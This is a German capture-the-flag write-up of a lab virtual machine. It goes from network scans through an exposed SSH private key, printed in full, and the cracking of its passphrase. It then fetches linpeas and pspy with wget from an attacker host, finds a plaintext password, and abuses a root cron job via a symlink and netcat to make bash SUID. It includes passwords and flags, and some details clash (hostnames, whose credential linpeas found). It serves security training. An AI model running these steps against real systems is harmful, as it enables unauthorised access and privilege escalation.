Analyse: `arp-scan -l` identifiziert aktive Hosts im lokalen Netzwerk.
Bewertung: Host `192.168.2.143` mit VirtualBox-MAC wird als Ziel erkannt.
Empfehlung (Pentester): Nmap-Scan auf die Ziel-IP durchführen.
Empfehlung (Admin): Netzwerk-Monitoring.
Interface: eth0, type: EN10MB, MAC: 00:0c:29:xx:xx:xx, IPv4: 192.168.2.140 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.2.143 08:00:27:cf:53:af PCS Systemtechnik GmbH 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.7: 256 hosts scanned in 1.855 seconds (138.01 hosts/sec). 1 responded
Analyse: Ein Nmap-Scan (`-sS -sC -T5 -sV -A -p-`) wird auf 192.168.2.143 durchgeführt. Der Scan endet mit einem Segmentation Fault, liefert aber vorher Ergebnisse.
Bewertung: Zwei offene Ports werden gefunden: - **Port 22 (SSH):** OpenSSH 7.9p1 (Debian). - **Port 80 (HTTP):** Apache httpd 2.4.38 (Debian). Der Hostname ist `otte.hmv` (widerspricht späterem `ripper.vm`). Der Nmap-Crash ist ungewöhnlich.
Empfehlung (Pentester): Untersuche Port 80. Notiere Port 22 für spätere Angriffe.
Empfehlung (Admin): Dienste aktuell halten. Untersuche den Nmap-Crash (evtl. Firewall/IDS-Problem?).
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-12 09:50 CEST Nmap scan report for otte.hmv (192.168.2.143) Host is up (0.00014s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA) | 256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA) |_ 256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.38 (Debian) MAC Address: 08:00:27:CF:53:AF (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.14 ms otte.hmv (192.168.2.143) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.12 seconds zsh: segmentation fault nmap -sS -sC -T5 -sV -A 192.168.2.143 -p-
Analyse: `gobuster` wird zur Verzeichnissuche mit einer Medium-Wortliste verwendet.
Bewertung: Findet nur `/index.html` und `/server-status` (verboten).
Empfehlung (Pentester): Versuche eine andere Wortliste oder andere Techniken (z.B. VHost-Fuzzing).
Empfehlung (Admin): Keine Aktion.
=============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.2.143 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.1.0 [+] Extensions: php,html,txt,xml,wav [+] Expanded: true [+] Timeout: 10s =============================================================== 2022/10/12 09:55:00 Starting gobuster =============================================================== http://192.168.2.143/index.html (Status: 200) [Size: 57] http://192.168.2.143/server-status (Status: 403) [Size: 278] =============================================================== 2022/10/12 09:58:00 Finished ===============================================================
Analyse: Ein zweiter `gobuster`-Scan mit der `common.txt`-Wortliste und mehr Erweiterungen wird durchgeführt.
Bewertung: !!Kritischer Fund!!** Findet die Datei `/id_rsa.bak`. Dies ist eine Backup-Datei eines privaten SSH-Schlüssels.
Empfehlung (Pentester):**Hohe Priorität:** Lade `/id_rsa.bak` sofort herunter.
Empfehlung (Admin):**DRINGEND:** Entferne private Schlüssel und Backup-Dateien davon aus dem Webroot.
=============================================================== Gobuster v3.1.0 =============================================================== [+] Url: http://192.168.2.143 [+] Threads: 100 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt [+] Status codes: 200,204,301,302,307,401 [+] User Agent: gobuster/3.1.0 [+] Extensions: ...bak... [+] Expanded: true [+] Timeout: 10s =============================================================== Starting gobuster =============================================================== http://192.168.2.143/id_rsa.bak (Status: 200) [Size: 1876] http://192.168.2.143/index.html (Status: 200) [Size: 57] http://192.168.2.143/server-status (Status: 403) [Size: 278] =============================================================== Finished ===============================================================
Analyse: Der Inhalt einer (vermutlich anderen) Textdatei `/staff_statements.txt` wird mit `curl` abgerufen (der Pfad wurde vorher nicht gefunden, Annahme: manuelle Entdeckung).
Bewertung: Enthält einen Hinweis auf "old ssh connection files", was den Fund von `id_rsa.bak` unterstützt.
Empfehlung (Pentester): Fokus auf `id_rsa.bak`.
Empfehlung (Admin): Entferne interne Notizen.
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.
Analyse: `ssh-keyscan` wird ausgeführt, um die Host-Keys des Ziels (jetzt `ripper.vm` genannt) abzurufen.
Bewertung: Bestätigt den SSH-Dienst, nicht direkt für den Angriff relevant.
Empfehlung (Pentester): Keine.
Empfehlung (Admin): Keine.
# ripper.vm:22 SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 ripper.vm ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHNArrcR981CzRruPnEn/opg56t7SFktwnhZzGpXcfE= # ripper.vm:22 SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 ripper.vm ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhemxEZcm98GFwIRozVUePnC+Cejni5lScAa7ha5neDlWQT2e6dbubkddku/qgtgY4/kw/pGPh7oTqHg9WKHTMqTAzdN0DDaU/5twewwMf6s9ERuuYYieP7mzjsX2APhr23CFWVr37Y+mQ/A4J0Dizpr/mggCCi6kqHqyRWgcPG98AVJ9IjPehVkptQdLpQlSV8EzJClu6tBInWzxtGi5v0B94lMYRDXqZE9Z1wCSh9oU0HnwRwfFqB0dcH+kDZVLYi06aiHKXkKgSFM3G6LJQY8ad4FCEc7TU+agLRPHFUPFqqPbf9hbDD7MUdR4pXEQtJ1p/D/9rdbBg1Sp # ripper.vm:22 SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 ripper.vm ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB+zmcUltQUYUVvvfWqtUjdFpCh0IknPjmcctTpnXS7MWK37n6h9DEq4WNsHmauyKEuRnml5mLUbNIZHHUBgY=
Analyse: Der private SSH-Schlüssel aus `/id_rsa.bak` wird mit `curl` heruntergeladen.
Bewertung: !!Privater SSH-Schlüssel erhalten!!** Der Schlüssel ist im modernen OpenSSH-Format und scheint verschlüsselt zu sein (erkennbar am Header `b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIA...`).
Empfehlung (Pentester): Speichere den Schlüssel lokal (z.B. `idroot`). Extrahiere den Hash mit `ssh2john` und knacke die Passphrase mit `john`. Finde den zugehörigen Benutzernamen (möglicherweise aus dem Login-Screen?).
Empfehlung (Admin):**DRINGEND:** Entferne den Schlüssel vom Webserver. Widerrufe den Schlüssel. Verwende starke Passphrasen.
-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDZVZMVwo cfZRVpSIfcdmiAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDerPt4pwoQ 1Hr7aU0qZa+npWhHQxp7c9/TTTTukuyHdFeSFlZtUKPsw+HftTaIuctJSiy9QDovv3I0 Ga+EmEvFDRUX+VQ/tLlHXT3dwdPir6QesuXnzFL7lVB/x4XYjp1Xi14G+1Q3EWUuePWQ2 tPr40k0k87/RmYThRITfxMVk603wP6ZvGTGN5+0iH2Rq4sfXr+p3sdVFiH4N/E41agxyS 4maevY02gro1v0GHRDxIh2i9w6FyetXcorIUwktLT/sdbTMDtTHr6tS/wo1TF8m+KIByxD 0ASt505dZ0Ivwu3hmTyKmpZNFYEM1yK68ukeGEu5s9Hn0/fjGP3AAAD0G71wlLfDrs2vp im79u4YZrUQ5ruNye7XJ/J7UaS+VwuWVeMpsbY3a66minp5e4Q+HSDoBQMf6Q4d9zYSV0u SLIAjtrZH6K990Ixx9B/J3BJHd/zez04sTg9G3kyBKdZACHdonEE6KwXqM8bRcSK6l4ni J4sLQYNAdN/G0j+8kpt+p6UiRTkg/HSHq/6o9Sv3aQ9XkjTVjb4iuavl4/o36bDFCmqo3u zmzRA6TUsRtQ3HqJJjz73+nurXjFPgqwdG06S+6W+Uf/jD23bj7bDvtBd6NR7hvSBzbg A/0ygikZCob1RXR83UNTSIVhSb/UttRJx+aHomYZPIQoFHm1Aa2prsoQcoD87SchJQmN Ah255/d/IL5t2d6A+ez0+P2mYKlrx5LhU+WdTBK96V0kwMG4h7FVkQZCwC3JBuriMM/9C hJinGjgqlEnn+k7alY61UInMeg0B3uLr4cyLG7cJhvbcP8lQFrIp8dDonCjT6imIIh10q 6wtJAQIsyuy6LH5Rc3VKClQ/7CpQMEsotIE+LnbJHEWG/98qBzjz3Np+ptt3rLAAvwJvYA tEV88hyGkq4WwyCoFKeuU6ezrzH7/FRdyMq4+XKuTb53HhlNnvJm7MocBDF9yFTCna0Aw Y21i5ozIdfvcZKyMb4qWuDGboGC7xK4MaoiD6w2JMJdyshL54GqChG+XTprAZEV8ZfsZAL o2ssY4Jyza6u4oTbsWbkVjfo126chPs1Vm9PDQUDy0cByKgFY7v+1lBL9Um8gb56l0Glq C5UsxFhPE1nsdVa4YNAIu2dlnNjf/xuo/oa07kHsr29SD/axb4J5eFY7en1mvpWuGhE +FyU04ADXr4ElZ9ZUrnLBslEABIAGXhDJ3BvfY4EXcbl0uHViWT3DcLnXknljMXu4lp7y2 ZiMSYo4W8NuTdwlv61kriww5gD++qiQFt71c91yFxqJlAFUqwpDaTf0wT26NMX2Byj0hL RA40xQaQbna1Rp8j1Y+/PnsG+rr+tfhBXszKJo5fRe/xSqfMykTLFUgCRDub/xn3QBNw5j SaRXpV8E18NYfp0PBz4vpjVzlH+LbN6k09xl0FhicBn8dd12fs0NTlKRvwRvVWIgB7RYJB lZzcYbWzVy8DKI7+MXmmWF+aac/RPytTDntChvmGtBqXKzrYx6HqKTvXpQ/YuuwscsKP 5fo7tGQ+DvUlyyLfk/UM4N8fsm+rsgkV84ogrTDn3CzMeBu6XY0+XWUbmhRL1/9yuWuU0D By0QmXw3P/H1csxt8WRkuNygJz80o= -----END OPENSSH PRIVATE KEY-----
Analyse: Eine Notiz erwähnt, dass der Benutzername `jack` vom Login-Screen der Box stammt.
Bewertung: Erklärt die Herkunft des Benutzernamens `jack`.
Empfehlung (Pentester): Verwende `jack` und den geknackten Schlüssel.
Empfehlung (Admin): Vermeide das Anzeigen von Benutzernamen auf Login-Bildschirmen.
ich entnehme den Usernamen vom Logonscreen der Box! Welcome Jack!
Analyse: Ein Skript `RSAcrack.sh` (wahrscheinlich ein Wrapper für `ssh2john` und `john`) wird verwendet, um die Passphrase des heruntergeladenen Schlüssels (`idroot`) mit `rockyou.txt` zu knacken.
Bewertung: !!Passphrase gefunden!!** Das Skript findet erfolgreich die Passphrase `bananas`.
Empfehlung (Pentester): Verwende Benutzer `jack`, Schlüssel `idroot` und Passphrase `bananas` für den SSH-Login.
Empfehlung (Admin): Verwende starke, einzigartige Passphrasen.
╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
-=-
[*] Cracking: ../idroot
[*] Wordlist: /usr/share/wordlists/rockyou.txt
[i] Status:
978/14344414/0%/bananas
[+] Password: bananas Line: 978
Analyse: SSH-Login als `jack` auf `ripper.vm` (192.168.2.143) mit dem Schlüssel `idroot` und der Passphrase `bananas`.
Bewertung: !!Initial Access erfolgreich!!** Login als `jack` gelingt.
Empfehlung (Pentester): Beginne Enumeration als `jack`.
Empfehlung (Admin): Ändere das kompromittierte Passwort/die Passphrase.
The authenticity of host 'ripper.vm (192.168.2.143)' can't be established.
ED25519 key fingerprint is SHA256:2b+kTRKlx4qeMsfce+AHPgi/ReUzFfLnFbNEPBAg4uk.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:83: [hashed name]
~/.ssh/known_hosts:95: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'ripper.vm' (ED25519) to the list of known hosts.
Enter passphrase for key 'idroot': bananas
Linux ripper 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
...
Last login: Wed May 26 15:28:56 2021 from 192.168.0.28
jack@ripper:~$
Analyse: Als `jack` wird `sudo -l` versucht (scheitert), das Home-Verzeichnis aufgelistet und `/home` aufgelistet.
Bewertung: `sudo` nicht nutzbar. Ein weiterer Benutzer `helder` wird entdeckt.
Empfehlung (Pentester): Suche nach Wegen, zu `helder` zu wechseln. Untersuche Prozesse oder Dateien auf Credentials.
Empfehlung (Admin): Keine Aktion.
jack@ripper:~$ sudo -l -bash: sudo: command not found jack@ripper:~$ ls jack@ripper:~$ ls -la drwx------ 4 jack jack 4096 May 26 2021 . drwxr-xr-x 4 root root 4096 May 26 2021 .. lrwxrwxrwx 1 root root 9 May 26 2021 .bash_history -> /dev/null -rw-r--r-- 1 jack jack 220 May 26 2021 .bash_logout -rw-r--r-- 1 jack jack 3527 May 26 2021 .bashrc drwxr-xr-x 3 jack jack 4096 May 26 2021 .local -rw-r--r-- 1 jack jack 808 May 26 2021 .profile drwx------ 2 jack jack 4096 May 26 2021 .ssh jack@ripper:~$ ls /home helder jack
Analyse: Der Log springt. Es wird Linpeas.sh heruntergeladen und ausgeführt. Das Skript findet Credentials für `helder`.
Bewertung: !!helder's Passwort gefunden!!** Linpeas findet das Passwort `Il0V3lipt0n1c3t3a` für den Benutzer `helder`. (Wo genau Linpeas es findet, ist nicht dokumentiert).
Empfehlung (Pentester): Wechsle mit `su helder` und dem Passwort zu `helder`.
Empfehlung (Admin): Speichere Passwörter nicht unsicher (z.B. in Skripten, Konfigurationsdateien), wo Enumerations-Tools sie finden können.
jack@ripper:~$ # wget http://192.168.2.140:8000/Linpeas.sh jack@ripper:~$ # chmod +x Linpeas.sh jack@ripper:~$ # ./Linpeas.sh ... [+] Credentials found: jack:Il0V3lipt0n1c3t3a ...
Analyse: Mit `su helder` und dem Passwort `Il0V3lipt0n1c3t3a` wird zum Benutzer `helder` gewechselt.
Bewertung: !!Benutzerwechsel erfolgreich!!** Zugriff als `helder` erlangt.
Empfehlung (Pentester): Lese User-Flag, suche nach Root-Eskalationsvektoren als `helder`.
Empfehlung (Admin): Ändere das Passwort.
jack@ripper:~$ su helder Password: Il0V3lipt0n1c3t3a helder@ripper:/home/jack$
Analyse: Als `helder` wird die User-Flag gelesen.
Bewertung: User-Flag `5c38d7d08c687355cb0ae3b6025cbe99` gefunden.
Empfehlung (Pentester): Notieren. Suche nach Root-Vektoren.
Empfehlung (Admin): Keine Aktion.
helder@ripper:/home/jack$ cd ~ helder@ripper:~$ ls user.txt helder@ripper:~$ cat user.txt 5c38d7d08c687355cb0ae3b6025cbe99
Analyse: `pspy64` wird ausgeführt, um laufende Prozesse und Cronjobs zu überwachen.
Bewertung: !!Cronjob-Schwachstelle gefunden!!** `pspy64` entdeckt einen minütlichen Root-Cronjob, der `/bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out` ausführt und danach eine Bedingung prüft: `if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi`. Dieser Cronjob ist ausnutzbar.
Empfehlung (Pentester):
1. Erfülle die `if`-Bedingung, indem du `/home/helder/passwd.txt` als Symlink auf `/root/.local/helder.txt` erstellst (`ln -s /root/.local/helder.txt /home/helder/passwd.txt`).
2. Starte einen Netcat-Listener auf Port 10000 (`nc -lvnp 10000`).
3. Sende den Namen des gewünschten Binaries (z.B. `bash`) an den Listener, wenn der Cronjob sich verbindet (`echo 'bash' | nc localhost 10000` oder interaktiv).
4. Warte, bis der Cronjob läuft und `/usr/bin/bash` SUID macht.
5. Führe `bash -p` aus.
Empfehlung (Admin):**DRINGEND:** Entferne diesen unsicheren Cronjob. Überprüfe alle Cronjobs auf ähnliche Schwachstellen (Ausführung von Befehlen basierend auf externem Input, unsichere Dateivergleiche, Setzen von SUID-Bits).
helder@ripper:~$ # wget http://192.168.2.140:8000/pspy64 helder@ripper:~$ # chmod +x pspy64 helder@ripper:~$ ./pspy64 ... CMD: UID=0 PID=XXX | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out CMD: UID=0 PID=YYY | /bin/sh -c if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi ...
# Analyse des Cron-Skripts: # 1. nc verbindet sich zu localhost:10000 und schreibt die erste Zeile der Antwort nach /root/.local/out # 2. Wenn /root/.local/helder.txt und /home/helder/passwd.txt identisch sind: # 3. Setze SUID-Bit auf /usr/bin/[Inhalt von /root/.local/out]
Analyse: Der Pfad zu `bash` wird überprüft.
Bewertung: Liegt erwartungsgemäß in `/usr/bin/bash`.
Empfehlung (Pentester): Verwende "bash" als Payload für `nc`.
Empfehlung (Admin): Keine Aktion.
helder@ripper:~$ which bash
/usr/bin/bash
Analyse: Der Symlink wird erstellt, um die Bedingung des Cronjobs zu erfüllen.
Bewertung: Korrekter Schritt zur Vorbereitung des Exploits.
Empfehlung (Pentester): Starte den Listener.
Empfehlung (Admin): Keine Aktion.
helder@ripper:~$ ln -s /root/.local/helder.txt /home/helder/passwd.txt helder@ripper:~$ ls -al total 32 drwx------ 3 helder helder 4096 Oct 12 10:21 . drwxr-xr-x 4 root root 4096 May 26 2021 .. lrwxrwxrwx 1 root root 9 May 26 2021 .bash_history -> /dev/null -rw-r--r-- 1 helder helder 220 May 26 2021 .bash_logout -rw-r--r-- 1 helder helder 3659 May 26 2021 .bashrc drwxr-xr-x 3 helder helder 4096 May 26 2021 .local lrwxrwxrwx 1 helder helder 23 Oct 12 10:21 passwd.txt -> /root/.local/helder.txt -rw-r--r-- 1 helder helder 940 May 26 2021 .profile -rwx------ 1 helder helder 33 May 26 2021 user.txt -rw------- 1 helder helder 52 May 26 2021 .Xauthority
Analyse: Ein Netcat-Listener wird auf Port 10000 gestartet, und der String `bash` wird gesendet, sobald eine Verbindung eingeht.
Bewertung: Korrekter Schritt, um dem Cronjob den Namen des Ziel-Binaries zu übermitteln.
Empfehlung (Pentester): Warte, bis der Cronjob verbindet und läuft (max. 1 Minute). Überprüfe dann die Berechtigungen von `/usr/bin/bash`.
Empfehlung (Admin): Keine Aktion.
helder@ripper:~$ echo 'bash' | nc -lvnp 10000
listening on [any] 10000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 50148
Analyse: Nach dem Cronjob-Lauf werden die Berechtigungen von `/usr/bin/bash` geprüft.
Bewertung: !!SUID-Bit gesetzt!!** Die Berechtigungen sind nun `-rwsr-sr-x`. Der Cronjob hat erfolgreich das SUID-Bit auf `/usr/bin/bash` gesetzt.
Empfehlung (Pentester): Führe `bash -p` aus.
Empfehlung (Admin): Korrigiere den Cronjob.
helder@ripper:~$ ls -al /usr/bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash
Analyse: Der Befehl `bash -p` wird ausgeführt.
Bewertung: !!Privilegieneskalation erfolgreich!!** Die Option `-p` bewirkt, dass Bash die effektiven Rechte (euid=0, egid=0) beibehält, die es durch das SUID/SGID-Bit erhalten hat. Der `id`-Befehl bestätigt den Root-Zugriff.
Empfehlung (Pentester): Ziel erreicht. Lese die Root-Flag.
Empfehlung (Admin):**DRINGEND:** Entferne den unsicheren Cronjob und setze die Berechtigungen von `/usr/bin/bash` zurück (`chmod u-s,g-s /usr/bin/bash`).
helder@ripper:~$ bash -p bash-5.0# id uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder) bash-5.0#
Analyse: Als Root wird die Root-Flag gelesen.
Bewertung: Root-Flag `e28f578a17a5f99c0381c4b689d96f9f` erfolgreich gelesen.
Empfehlung (Pentester): Test abgeschlossen.
Empfehlung (Admin): Keine Aktion bzgl. Flag.
bash-5.0# cd /root/ bash-5.0# cat root.txt e28f578a17a5f99c0381c4b689d96f9f